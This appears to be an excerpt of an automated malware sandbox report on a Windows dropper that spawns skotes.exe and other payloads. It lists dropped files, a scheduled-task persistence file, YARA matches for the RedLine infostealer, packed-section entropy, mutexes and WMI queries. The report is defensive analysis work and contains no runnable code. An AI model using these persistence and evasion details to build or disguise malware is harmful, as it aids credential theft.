                    Source: 24da220eed.exe.5.dr | Static PE information: section name:
                    Source: 24da220eed.exe.5.dr | Static PE information: section name: .idata
                    Source: 24da220eed.exe.5.dr | Static PE information: section name:
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr | Static PE information: section name:
                    Source: MZHUJDVAZFQBUC9CQYK.exe.29.dr | Static PE information: section name: .idata
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr | Static PE information: section name:
                    Source: E8X4KAZW48ZU3YY0Y4JPME949S3Q.exe.29.dr | Static PE information: section name: .idata
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | File created: C:\Windows\Tasks\skotes.job
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B478BB
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B48860
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B47049
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B431A8
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B04B30
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B04DE0
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B42D10
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B4779B
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B37F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C178BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C17049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C18860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C131A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00BD4B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00BD4DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C12D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C1779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_00C07F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C178BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C17049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C18860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C131A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00BD4B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00BD4DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C12D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C1779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_00C07F36
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FE58D5
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FDB100
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_01009280
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF3B50
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FFD34A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_01010D20
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_0100C5A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF7440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_01010460
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF1D00
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FDE687
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FDCE45
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FD8600
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_01008EA0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FE2750
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FEB8F6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FE60E9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FFC0E6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FFA0CA
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FFC09E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_0100F18B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FDC840
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FDD83C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_011869CC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FDD021
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_010109E0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FED003
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FFC9EB
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF81CC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF39B9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FF91AE
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFE1809_2_00FFE180
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD397B9_2_00FD397B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE81699_2_00FE8169
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD61609_2_00FD6160
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEE9609_2_00FEE960
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC09E9_2_00FFC09E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010088B09_2_010088B0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010038D09_2_010038D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF69109_2_00FF6910
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD59019_2_00FD5901
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE9AD09_2_00FE9AD0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF42D09_2_00FF42D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF8ABC9_2_00FF8ABC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD42709_2_00FD4270
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEE2209_2_00FEE220
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF83D89_2_00FF83D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD73D09_2_00FD73D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDF3C09_2_00FDF3C0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100CA409_2_0100CA40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100DA4D9_2_0100DA4D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01005A4F9_2_01005A4F
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEEB809_2_00FEEB80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01009A809_2_01009A80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFF3779_2_00FFF377
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDAB409_2_00FDAB40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF13409_2_00FF1340
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE8B1B9_2_00FE8B1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD93109_2_00FD9310
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDD4F39_2_00FDD4F3
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF24E09_2_00FF24E0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01009D309_2_01009D30
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF04C69_2_00FF04C6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE4CA09_2_00FE4CA0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100FD709_2_0100FD70
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE747D9_2_00FE747D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01007DA99_2_01007DA9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100A5D49_2_0100A5D4
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100CDF09_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01003C109_2_01003C10
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD5DC09_2_00FD5DC0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100A4409_2_0100A440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF45609_2_00FF4560
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFCD5E9_2_00FFCD5E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFCD4C9_2_00FFCD4C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFC53C9_2_00FFC53C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF6D2E9_2_00FF6D2E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE1D2B9_2_00FE1D2B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE051B9_2_00FE051B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_01001CF09_2_01001CF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF46D09_2_00FF46D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEAEB09_2_00FEAEB0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFFE749_2_00FFFE74
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF0E6C9_2_00FF0E6C
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FFEE639_2_00FFEE63
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FEE6309_2_00FEE630
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE961B9_2_00FE961B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FDF60D9_2_00FDF60D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_0100FE009_2_0100FE00
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010086509_2_01008650
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FD97809_2_00FD9780
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FE6F529_2_00FE6F52
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF77409_2_00FF7740
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF97399_2_00FF9739
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_00FF5F1B9_2_00FF5F1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: 9_2_010106F09_2_010106F0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BEDF80 appears 36 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BE80C0 appears 260 times
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: String function: 00FD7F60 appears 40 times
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeCode function: String function: 00FE4C90 appears 77 times
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeCode function: String function: 00B180C0 appears 130 times
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980
                    Source: cMTqzvmx9u.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                    Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
                    Source: 7620ab885d.exe.5.dr Static PE information: Section: ZLIB complexity 0.9994702308006536
                    Source: random[3].exe.5.dr Static PE information: Section: xyfieepk ZLIB complexity 0.9940755390646877
                    Source: random[1].exe.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
                    Source: random[1].exe.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                    Source: 8469cb4d4d.exe.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
                    Source: 8469cb4d4d.exe.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                    Source: random[1].exe1.5.dr Static PE information: Section: ZLIB complexity 0.9994702308006536
                    Source: random[2].exe0.5.dr Static PE information: Section: .bss ZLIB complexity 1.0003244500411184
                    Source: 7ddd2a748c.exe.5.dr Static PE information: Section: .bss ZLIB complexity 1.0003244500411184
                    Source: random[1].exe2.5.dr Static PE information: Section: ZLIB complexity 0.997464950770548
                    Source: random[1].exe2.5.dr Static PE information: Section: aseoxclk ZLIB complexity 0.9949617656389967
                    Source: b285303eae.exe.5.dr Static PE information: Section: ZLIB complexity 0.997464950770548
                    Source: b285303eae.exe.5.dr Static PE information: Section: aseoxclk ZLIB complexity 0.9949617656389967
                    Source: random[3].exe0.5.dr Static PE information: Section: ZLIB complexity 0.9995212928921569
                    Source: random[3].exe0.5.dr Static PE information: Section: qppoenam ZLIB complexity 0.9949168669871795
                    Source: b9ba85c997.exe.5.dr Static PE information: Section: ZLIB complexity 0.9995212928921569
                    Source: b9ba85c997.exe.5.dr Static PE information: Section: qppoenam ZLIB complexity 0.9949168669871795
                    Source: f53b3c5fe2.exe.5.dr Static PE information: Section: ZLIB complexity 0.9974582619863014
                    Source: f53b3c5fe2.exe.5.dr Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                    Source: 6b06c8a266.exe.5.dr Static PE information: Section: xyfieepk ZLIB complexity 0.9940755390646877
                    Source: random[4].exe0.5.dr Static PE information: Section: uiswpquv ZLIB complexity 0.9899963146425432
                    Source: 24da220eed.exe.5.dr Static PE information: Section: uiswpquv ZLIB complexity 0.9899963146425432
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@95/117@0/40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe Code function: 9_2_01002070 CoCreateInstance
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe File created: C:\Program Files\Google\Chrome\Extensions
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1384:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2456
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe System information queried: HandleInformation
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
